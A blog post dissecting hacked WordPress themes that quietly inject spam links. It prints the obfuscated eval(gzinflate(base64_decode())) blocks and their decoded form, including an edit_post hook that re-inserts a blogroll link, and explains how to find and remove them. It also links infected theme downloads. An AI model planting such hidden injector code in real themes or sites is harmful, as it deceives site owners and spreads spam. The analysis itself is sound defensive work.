Dissection of a hacked WordPress Theme (how the hacked themes inject links and how to detect them)

Hacked WordPressWhile I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? 😀 Managed to give me a fright at the first sight too. Whereas, I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mambo-jambo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with it’s share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and helps executing it using the eval() statement. Prior to that, the code has been base64 encoded (the same encoding that is applied to email attachments) and then gzipped – if you follow the order of decoding.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…

footer

< ?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file, functions.php. Didn’t have to look far. A search for the terms eval andbase64 got me to the desired point. Once again I faced a block of code that went like…

< ?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code..

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !

The nexus

W A R N I N G!Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Philippino blogger Yuga, outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

Downloads

[download id=7,8,9]

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

Comments

Comments are closed.